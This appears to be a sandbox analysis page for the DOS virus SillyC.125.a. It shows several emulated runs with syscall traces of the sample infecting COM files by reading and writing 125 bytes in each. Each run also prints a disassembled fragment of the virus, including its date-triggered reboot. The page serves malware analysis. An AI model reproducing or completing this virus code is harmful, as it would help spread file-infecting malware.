Sample viewer

vx.netlux.org/Virus.DOS.SillyC.125.a

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:20:39.953000837Z 26 PC: 12a51 | Set disk transfer address
2018-12-17T22:20:39.957608985Z 42 PC: 12a55 | Get date 0x12a55: cmp dl, 0x17
0x12a58: jne 0x12a5f
0x12a5a: ljmp 0xf000:0xfff0
0x12a5f: mov dx, 0x175
0x12a62: sub cx, cx
0x12a64: mov ah, 0x4e
0x12a66: int 0x21
0x12a68: mov cl, 0x7d
0x12a6a: mov dx, 0xfe1e
0x12a6d: mov ax, 0x3d02
0x12a70: int 0x21
0x12a72: xchg ax, bx
0x12a73: mov dx, si
0x12a75: mov ah, 0x3f
0x12a77: int 0x21
0x12a79: push di
0x12a7a: cmpsw word ptr [si], word ptr es:[di]
0x12a7b: pop di
0x12a7c: je 0x12a95
0x12a7e: mov al, 2
2018-12-17T22:20:39.960774738Z 78 PC: 12a68 | Find first file
2018-12-17T22:20:39.967462537Z 61 PC: 12a72 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:20:39.974755947Z 63 PC: 12a79 | Read file or device (Read 125 bytes on handle 5)
2018-12-17T22:20:39.981995815Z 66 PC: 12ab2 | Move file pointer
2018-12-17T22:20:39.983760092Z 64 PC: 12a8a | Write file or device (Write 125 bytes on handle 5)
2018-12-17T22:20:40.00022698Z 66 PC: 12ab2 | Move file pointer
2018-12-17T22:20:40.002630566Z 64 PC: 12a95 | Write file or device (Write 125 bytes on handle 5)
2018-12-17T22:20:40.024850924Z 62 PC: 12a99 | Close file
2018-12-17T22:20:40.058053583Z 79 PC: 12a9f | Find next file
2018-12-17T22:20:40.062220292Z 61 PC: 12a72 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:20:40.077681504Z 63 PC: 12a79 | Read file or device (Read 125 bytes on handle 5)
2018-12-17T22:20:40.083966583Z 66 PC: 12ab2 | Move file pointer
2018-12-17T22:20:40.093409124Z 64 PC: 12a8a | Write file or device (Write 125 bytes on handle 5)
2018-12-17T22:20:40.100299563Z 66 PC: 12ab2 | Move file pointer
2018-12-17T22:20:40.101647747Z 64 PC: 12a95 | Write file or device (Write 125 bytes on handle 5)
2018-12-17T22:20:40.104804155Z 62 PC: 12a99 | Close file
2018-12-17T22:20:40.112652587Z 79 PC: 12a9f | Find next file
2018-12-17T22:20:40.115371435Z 61 PC: 12a72 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:20:40.12357699Z 63 PC: 12a79 | Read file or device (Read 125 bytes on handle 5)
2018-12-17T22:20:40.13090405Z 66 PC: 12ab2 | Move file pointer
2018-12-17T22:20:40.132764853Z 64 PC: 12a8a | Write file or device (Write 125 bytes on handle 5)
2018-12-17T22:20:40.137021129Z 66 PC: 12ab2 | Move file pointer
2018-12-17T22:20:40.138938347Z 64 PC: 12a95 | Write file or device (Write 125 bytes on handle 5)
2018-12-17T22:20:40.142137943Z 62 PC: 12a99 | Close file
2018-12-17T22:20:40.151013047Z 79 PC: 12a9f | Find next file
2018-12-17T22:20:40.154246871Z 61 PC: 12a72 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:20:40.161434271Z 63 PC: 12a79 | Read file or device (Read 125 bytes on handle 5)
2018-12-17T22:20:40.169287838Z 66 PC: 12ab2 | Move file pointer
2018-12-17T22:20:40.171255198Z 64 PC: 12a8a | Write file or device (Write 125 bytes on handle 5)
2018-12-17T22:20:40.174591417Z 66 PC: 12ab2 | Move file pointer
2018-12-17T22:20:40.177492368Z 64 PC: 12a95 | Write file or device (Write 125 bytes on handle 5)
2018-12-17T22:20:40.180386202Z 62 PC: 12a99 | Close file
2018-12-17T22:20:40.188261169Z 79 PC: 12a9f | Find next file
2018-12-17T22:20:40.191494887Z 61 PC: 12a72 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:20:40.211490786Z 63 PC: 12a79 | Read file or device (Read 125 bytes on handle 5)
2018-12-17T22:20:40.219720052Z 66 PC: 12ab2 | Move file pointer
2018-12-17T22:20:40.221860002Z 64 PC: 12a8a | Write file or device (Write 125 bytes on handle 5)
2018-12-17T22:20:40.224813728Z 66 PC: 12ab2 | Move file pointer
2018-12-17T22:20:40.226368564Z 64 PC: 12a95 | Write file or device (Write 125 bytes on handle 5)
2018-12-17T22:20:40.229754578Z 62 PC: 12a99 | Close file
2018-12-17T22:20:40.237887123Z 79 PC: 12a9f | Find next file
2018-12-17T22:20:40.24061518Z 61 PC: 12a72 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:20:40.247709159Z 63 PC: 12a79 | Read file or device (Read 125 bytes on handle 5)
2018-12-17T22:20:40.254270242Z 66 PC: 12ab2 | Move file pointer
2018-12-17T22:20:40.255630345Z 64 PC: 12a8a | Write file or device (Write 125 bytes on handle 5)
2018-12-17T22:20:40.264086691Z 66 PC: 12ab2 | Move file pointer
2018-12-17T22:20:40.266081078Z 64 PC: 12a95 | Write file or device (Write 125 bytes on handle 5)
2018-12-17T22:20:40.272708119Z 62 PC: 12a99 | Close file
2018-12-17T22:20:40.281256863Z 79 PC: 12a9f | Find next file
2018-12-17T22:20:40.284791634Z 61 PC: 12a72 | Open file (Filename = 'PAH.COM')
2018-12-17T22:20:40.291486427Z 63 PC: 12a79 | Read file or device (Read 125 bytes on handle 5)
2018-12-17T22:20:40.298276145Z 66 PC: 12ab2 | Move file pointer
2018-12-17T22:20:40.300085108Z 64 PC: 12a8a | Write file or device (Write 125 bytes on handle 5)
2018-12-17T22:20:40.302808473Z 66 PC: 12ab2 | Move file pointer
2018-12-17T22:20:40.304610964Z 64 PC: 12a95 | Write file or device (Write 125 bytes on handle 5)
2018-12-17T22:20:40.307668588Z 62 PC: 12a99 | Close file
2018-12-17T22:20:40.315558523Z 79 PC: 12a9f | Find next file
2018-12-17T22:20:40.318630447Z 61 PC: 12a72 | Open file (Filename = 'TEST.COM')
2018-12-17T22:20:40.325957466Z 63 PC: 12a79 | Read file or device (Read 125 bytes on handle 5)
2018-12-17T22:20:40.328800463Z 62 PC: 12a99 | Close file
2018-12-17T22:20:40.331573564Z 79 PC: 12a9f | Find next file
2018-12-17T22:20:40.334735781Z 66 PC: 12ab2 | Move file pointer

{"DateBased":true,"Day":23,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3587,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:49:30.809509384Z 26 PC: 12a51 | Set disk transfer address
2018-12-25T11:49:30.810944473Z 42 PC: 12a55 | Get date 0x12a55: cmp dl, 0x17
0x12a58: jne 0x12a5f
0x12a5a: ljmp 0xf000:0xfff0
0x12a5f: mov dx, 0x175
0x12a62: sub cx, cx
0x12a64: mov ah, 0x4e
0x12a66: int 0x21
0x12a68: mov cl, 0x7d
0x12a6a: mov dx, 0xfe1e
0x12a6d: mov ax, 0x3d02
0x12a70: int 0x21
0x12a72: xchg ax, bx
0x12a73: mov dx, si
0x12a75: mov ah, 0x3f
0x12a77: int 0x21
0x12a79: push di
0x12a7a: cmpsw word ptr [si], word ptr es:[di]
0x12a7b: pop di
0x12a7c: je 0x12a95
0x12a7e: mov al, 2
2018-12-25T11:49:33.016340863Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T11:49:33.01817763Z 72 PC: 8f1bd | Allocate memory
2018-12-25T11:49:33.020551743Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T11:49:33.024185626Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T11:49:33.035885484Z 66 PC: 91f95 | Move file pointer
2018-12-25T11:49:33.037437235Z 62 PC: 91fc1 | Close file
2018-12-25T11:49:33.040141482Z 75 PC: 91fe0 | Execute program
2018-12-25T11:49:33.058350573Z 98 PC: 916f1 | Get current PSP
2018-12-25T11:49:33.059606328Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T11:49:33.064857959Z 48 PC: c609 | Get DOS version
2018-12-25T11:49:33.068578344Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T11:49:33.071057819Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T11:49:33.073510659Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T11:49:33.077745917Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T11:49:33.081834316Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T11:49:33.08720697Z 61 PC: 91f88 | Open file (See above)
2018-12-25T11:49:33.099605648Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T11:49:33.101356925Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T11:49:33.103887857Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T11:49:33.128675964Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T11:49:33.13297049Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T11:49:33.134268044Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T11:49:33.13609122Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T11:49:33.137273366Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:49:33.13897007Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:49:33.14018106Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T11:49:33.148476728Z 62 PC: 8f8eb | Close file
2018-12-25T11:49:33.150350474Z 62 PC: 8f8f2 | Close file
2018-12-25T11:49:33.160796202Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.162001006Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.163111687Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.164736254Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.166330198Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.167527036Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.16952574Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.170664706Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.171829655Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.173246399Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.175141292Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.176760124Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.178520835Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.18096066Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.182787347Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.184436257Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.186237211Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.187710787Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.189169792Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.191311236Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.19276207Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.194190005Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.196004833Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.197282146Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.198541064Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.200269735Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.201701584Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.203104769Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.205293111Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:49:33.207535885Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T11:49:33.213603249Z 62 PC: 8f90e | Close file
2018-12-25T11:49:33.215828475Z 69 PC: 8f915 | Duplicate handle
2018-12-25T11:49:33.217675829Z 69 PC: 8f919 | Duplicate handle
2018-12-25T11:49:33.219439531Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T11:49:33.225058859Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T11:49:33.226448041Z 61 PC: 9387b | Open file (See above)
2018-12-25T11:49:33.231960008Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T11:49:33.233676673Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T11:49:33.235070565Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T11:49:33.23712232Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T11:49:33.239288723Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T11:49:33.240790512Z 72 PC: 8fa02 | Allocate memory
2018-12-25T11:49:33.24252036Z 72 PC: 8fa06 | Allocate memory
2018-12-25T11:49:33.244842592Z 73 PC: 8fa11 | Release memory
2018-12-25T11:49:33.246346479Z 73 PC: 8efea | Release memory
2018-12-25T11:49:33.247624053Z 74 PC: 8f003 | Reallocate memory
2018-12-25T11:49:33.251110114Z 72 PC: 8f054 | Allocate memory
2018-12-25T11:49:33.253236812Z 72 PC: 8f058 | Allocate memory
2018-12-25T11:49:33.254681948Z 73 PC: 8f060 | Release memory
2018-12-25T11:49:33.256453632Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T11:49:33.266036327Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:49:33.271863469Z 66 PC: 8f0ad | Move file pointer
2018-12-25T11:49:33.273528034Z 62 PC: 8f0d1 | Close file
2018-12-25T11:49:33.275472973Z 75 PC: 8f0f2 | Execute program
2018-12-25T11:49:33.299007387Z 80 PC: 12be9 | Set current PSP
2018-12-25T11:49:33.299922166Z 48 PC: 12bee | Get DOS version
2018-12-25T11:49:33.301533073Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T11:49:33.303952644Z 101 PC: 12c74 | Get extended country info
2018-12-25T11:49:33.305278179Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T11:49:33.306515292Z 74 PC: 12cdc | Reallocate memory
2018-12-25T11:49:33.30783105Z 72 PC: 1355d | Allocate memory
2018-12-25T11:49:33.309211785Z 25 PC: 13596 | Get default drive
2018-12-25T11:49:33.310441683Z 71 PC: 135ad | Get current directory
2018-12-25T11:49:33.312844481Z 59 PC: 135ba | Change current directory
2018-12-25T11:49:33.318188347Z 59 PC: 135c8 | Change current directory
2018-12-25T11:49:33.324936254Z 59 PC: 135d3 | Change current directory
2018-12-25T11:49:33.328610464Z 25 PC: 12d13 | Get default drive
2018-12-25T11:49:33.329726952Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T11:49:33.330957412Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T11:49:33.331841833Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:49:33.334111249Z 80 PC: 1301d | Set current PSP
2018-12-25T11:49:33.336272183Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T11:49:33.337914664Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:49:33.33918769Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:49:33.340714914Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T11:49:33.342966893Z 72 PC: 130ec | Allocate memory
2018-12-25T11:49:33.344747788Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T11:49:33.351769739Z 62 PC: 131ba | Close file
2018-12-25T11:49:33.35411172Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T11:49:33.355301797Z 74 PC: 1197c | Reallocate memory
2018-12-25T11:49:33.357527976Z 72 PC: 11991 | Allocate memory
2018-12-25T11:49:33.359169648Z 73 PC: 119b2 | Release memory
2018-12-25T11:49:33.360481377Z 72 PC: 119bd | Allocate memory
2018-12-25T11:49:33.363232884Z 73 PC: 119df | Release memory
2018-12-25T11:49:33.376852284Z 72 PC: 119f5 | Allocate memory
2018-12-25T11:49:33.378777418Z 72 PC: 119fd | Allocate memory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3587,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:49:31.040005962Z 26 PC: 12a51 | Set disk transfer address
2018-12-25T11:49:31.042878787Z 42 PC: 12a55 | Get date 0x12a55: cmp dl, 0x17
0x12a58: jne 0x12a5f
0x12a5a: ljmp 0xf000:0xfff0
0x12a5f: mov dx, 0x175
0x12a62: sub cx, cx
0x12a64: mov ah, 0x4e
0x12a66: int 0x21
0x12a68: mov cl, 0x7d
0x12a6a: mov dx, 0xfe1e
0x12a6d: mov ax, 0x3d02
0x12a70: int 0x21
0x12a72: xchg ax, bx
0x12a73: mov dx, si
0x12a75: mov ah, 0x3f
0x12a77: int 0x21
0x12a79: push di
0x12a7a: cmpsw word ptr [si], word ptr es:[di]
0x12a7b: pop di
0x12a7c: je 0x12a95
0x12a7e: mov al, 2
2018-12-25T11:49:31.045687224Z 78 PC: 12a68 | Find first file
2018-12-25T11:49:31.05270913Z 61 PC: 12a72 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:49:31.061086049Z 63 PC: 12a79 | Read file or device (Read 125 bytes on handle 5)
2018-12-25T11:49:31.068500733Z 66 PC: 12ab2 | Move file pointer
2018-12-25T11:49:31.070929119Z 64 PC: 12a8a | Write file or device (Write 125 bytes on handle 5)
2018-12-25T11:49:31.087000218Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.090754577Z 64 PC: 12a95 | Write file or device (Write 125 bytes on handle 5)
2018-12-25T11:49:31.098845581Z 62 PC: 12a99 | Close file
2018-12-25T11:49:31.108250633Z 79 PC: 12a9f | Find next file
2018-12-25T11:49:31.11184254Z 61 PC: 12a72 | Open file (See above)
2018-12-25T11:49:31.119212575Z 63 PC: 12a79 | Read file or device (See above)
2018-12-25T11:49:31.126445648Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.129013916Z 64 PC: 12a8a | Write file or device (See above)
2018-12-25T11:49:31.132083788Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.134430952Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T11:49:31.138066167Z 62 PC: 12a99 | Close file (See above)
2018-12-25T11:49:31.147413138Z 79 PC: 12a9f | Find next file (See above)
2018-12-25T11:49:31.150382734Z 61 PC: 12a72 | Open file (See above)
2018-12-25T11:49:31.158432713Z 63 PC: 12a79 | Read file or device (See above)
2018-12-25T11:49:31.165336533Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.166882677Z 64 PC: 12a8a | Write file or device (See above)
2018-12-25T11:49:31.170364441Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.172108853Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T11:49:31.174897262Z 62 PC: 12a99 | Close file (See above)
2018-12-25T11:49:31.201669187Z 79 PC: 12a9f | Find next file (See above)
2018-12-25T11:49:31.204801874Z 61 PC: 12a72 | Open file (See above)
2018-12-25T11:49:31.213647085Z 63 PC: 12a79 | Read file or device (See above)
2018-12-25T11:49:31.221999969Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.223797744Z 64 PC: 12a8a | Write file or device (See above)
2018-12-25T11:49:31.226857172Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.228516985Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T11:49:31.232127823Z 62 PC: 12a99 | Close file (See above)
2018-12-25T11:49:31.24094385Z 79 PC: 12a9f | Find next file (See above)
2018-12-25T11:49:31.243681316Z 61 PC: 12a72 | Open file (See above)
2018-12-25T11:49:31.256797231Z 63 PC: 12a79 | Read file or device (See above)
2018-12-25T11:49:31.263968985Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.265876567Z 64 PC: 12a8a | Write file or device (See above)
2018-12-25T11:49:31.272344724Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.274101861Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T11:49:31.27740619Z 62 PC: 12a99 | Close file (See above)
2018-12-25T11:49:31.28725896Z 79 PC: 12a9f | Find next file (See above)
2018-12-25T11:49:31.290119784Z 61 PC: 12a72 | Open file (See above)
2018-12-25T11:49:31.297454682Z 63 PC: 12a79 | Read file or device (See above)
2018-12-25T11:49:31.305451928Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.306528867Z 64 PC: 12a8a | Write file or device (See above)
2018-12-25T11:49:31.313853767Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.317748538Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T11:49:31.326391288Z 62 PC: 12a99 | Close file (See above)
2018-12-25T11:49:31.332235069Z 79 PC: 12a9f | Find next file (See above)
2018-12-25T11:49:31.334237099Z 61 PC: 12a72 | Open file (See above)
2018-12-25T11:49:31.339238849Z 63 PC: 12a79 | Read file or device (See above)
2018-12-25T11:49:31.34627722Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.347890833Z 64 PC: 12a8a | Write file or device (See above)
2018-12-25T11:49:31.351484242Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.352901007Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T11:49:31.356468612Z 62 PC: 12a99 | Close file (See above)
2018-12-25T11:49:31.366362285Z 79 PC: 12a9f | Find next file (See above)
2018-12-25T11:49:31.369745019Z 61 PC: 12a72 | Open file (See above)
2018-12-25T11:49:31.377282268Z 63 PC: 12a79 | Read file or device (See above)
2018-12-25T11:49:31.38124539Z 62 PC: 12a99 | Close file (See above)
2018-12-25T11:49:31.383544111Z 79 PC: 12a9f | Find next file (See above)
2018-12-25T11:49:31.386421471Z 66 PC: 12ab2 | Move file pointer (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3587,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:49:31.148901765Z 26 PC: 12a51 | Set disk transfer address
2018-12-25T11:49:31.152198057Z 42 PC: 12a55 | Get date 0x12a55: cmp dl, 0x17
0x12a58: jne 0x12a5f
0x12a5a: ljmp 0xf000:0xfff0
0x12a5f: mov dx, 0x175
0x12a62: sub cx, cx
0x12a64: mov ah, 0x4e
0x12a66: int 0x21
0x12a68: mov cl, 0x7d
0x12a6a: mov dx, 0xfe1e
0x12a6d: mov ax, 0x3d02
0x12a70: int 0x21
0x12a72: xchg ax, bx
0x12a73: mov dx, si
0x12a75: mov ah, 0x3f
0x12a77: int 0x21
0x12a79: push di
0x12a7a: cmpsw word ptr [si], word ptr es:[di]
0x12a7b: pop di
0x12a7c: je 0x12a95
0x12a7e: mov al, 2
2018-12-25T11:49:31.153808942Z 78 PC: 12a68 | Find first file
2018-12-25T11:49:31.157691274Z 61 PC: 12a72 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:49:31.162982865Z 63 PC: 12a79 | Read file or device (Read 125 bytes on handle 5)
2018-12-25T11:49:31.168383857Z 66 PC: 12ab2 | Move file pointer
2018-12-25T11:49:31.170019286Z 64 PC: 12a8a | Write file or device (Write 125 bytes on handle 5)
2018-12-25T11:49:31.184364666Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.187343331Z 64 PC: 12a95 | Write file or device (Write 125 bytes on handle 5)
2018-12-25T11:49:31.194538442Z 62 PC: 12a99 | Close file
2018-12-25T11:49:31.207254224Z 79 PC: 12a9f | Find next file
2018-12-25T11:49:31.219164924Z 61 PC: 12a72 | Open file (See above)
2018-12-25T11:49:31.224577063Z 63 PC: 12a79 | Read file or device (See above)
2018-12-25T11:49:31.228700678Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.230321994Z 64 PC: 12a8a | Write file or device (See above)
2018-12-25T11:49:31.232748036Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.233714883Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T11:49:31.236097144Z 62 PC: 12a99 | Close file (See above)
2018-12-25T11:49:31.241032021Z 79 PC: 12a9f | Find next file (See above)
2018-12-25T11:49:31.242664808Z 61 PC: 12a72 | Open file (See above)
2018-12-25T11:49:31.246897357Z 63 PC: 12a79 | Read file or device (See above)
2018-12-25T11:49:31.250814616Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.25180038Z 64 PC: 12a8a | Write file or device (See above)
2018-12-25T11:49:31.253965317Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.255168152Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T11:49:31.257485646Z 62 PC: 12a99 | Close file (See above)
2018-12-25T11:49:31.27442588Z 79 PC: 12a9f | Find next file (See above)
2018-12-25T11:49:31.276841975Z 61 PC: 12a72 | Open file (See above)
2018-12-25T11:49:31.284608786Z 63 PC: 12a79 | Read file or device (See above)
2018-12-25T11:49:31.294446549Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.295950796Z 64 PC: 12a8a | Write file or device (See above)
2018-12-25T11:49:31.298693205Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.301004743Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T11:49:31.303574516Z 62 PC: 12a99 | Close file (See above)
2018-12-25T11:49:31.311082535Z 79 PC: 12a9f | Find next file (See above)
2018-12-25T11:49:31.313781926Z 61 PC: 12a72 | Open file (See above)
2018-12-25T11:49:31.320473116Z 63 PC: 12a79 | Read file or device (See above)
2018-12-25T11:49:31.326877287Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.332576529Z 64 PC: 12a8a | Write file or device (See above)
2018-12-25T11:49:31.335256479Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.336437404Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T11:49:31.339264984Z 62 PC: 12a99 | Close file (See above)
2018-12-25T11:49:31.347018386Z 79 PC: 12a9f | Find next file (See above)
2018-12-25T11:49:31.350435217Z 61 PC: 12a72 | Open file (See above)
2018-12-25T11:49:31.358883764Z 63 PC: 12a79 | Read file or device (See above)
2018-12-25T11:49:31.366543089Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.368397012Z 64 PC: 12a8a | Write file or device (See above)
2018-12-25T11:49:31.376614044Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.378576117Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T11:49:31.385393687Z 62 PC: 12a99 | Close file (See above)
2018-12-25T11:49:31.39389689Z 79 PC: 12a9f | Find next file (See above)
2018-12-25T11:49:31.396825977Z 61 PC: 12a72 | Open file (See above)
2018-12-25T11:49:31.403652965Z 63 PC: 12a79 | Read file or device (See above)
2018-12-25T11:49:31.409792148Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.411697666Z 64 PC: 12a8a | Write file or device (See above)
2018-12-25T11:49:31.414163975Z 66 PC: 12ab2 | Move file pointer (See above)
2018-12-25T11:49:31.415341881Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T11:49:31.418510638Z 62 PC: 12a99 | Close file (See above)
2018-12-25T11:49:31.426431738Z 79 PC: 12a9f | Find next file (See above)
2018-12-25T11:49:31.428946336Z 61 PC: 12a72 | Open file (See above)
2018-12-25T11:49:31.435901721Z 63 PC: 12a79 | Read file or device (See above)
2018-12-25T11:49:31.44264098Z 62 PC: 12a99 | Close file (See above)
2018-12-25T11:49:31.444278671Z 79 PC: 12a9f | Find next file (See above)
2018-12-25T11:49:31.446507979Z 66 PC: 12ab2 | Move file pointer (See above)

{"DateBased":true,"Day":23,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3587,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:49:31.235478635Z 26 PC: 12a51 | Set disk transfer address
2018-12-25T11:49:31.237129261Z 42 PC: 12a55 | Get date 0x12a55: cmp dl, 0x17
0x12a58: jne 0x12a5f
0x12a5a: ljmp 0xf000:0xfff0
0x12a5f: mov dx, 0x175
0x12a62: sub cx, cx
0x12a64: mov ah, 0x4e
0x12a66: int 0x21
0x12a68: mov cl, 0x7d
0x12a6a: mov dx, 0xfe1e
0x12a6d: mov ax, 0x3d02
0x12a70: int 0x21
0x12a72: xchg ax, bx
0x12a73: mov dx, si
0x12a75: mov ah, 0x3f
0x12a77: int 0x21
0x12a79: push di
0x12a7a: cmpsw word ptr [si], word ptr es:[di]
0x12a7b: pop di
0x12a7c: je 0x12a95
0x12a7e: mov al, 2
2018-12-25T11:49:33.430886601Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T11:49:33.432461038Z 72 PC: 8f1bd | Allocate memory
2018-12-25T11:49:33.435332165Z 99 PC: 90858 | Get DBCS lead byte table pointer
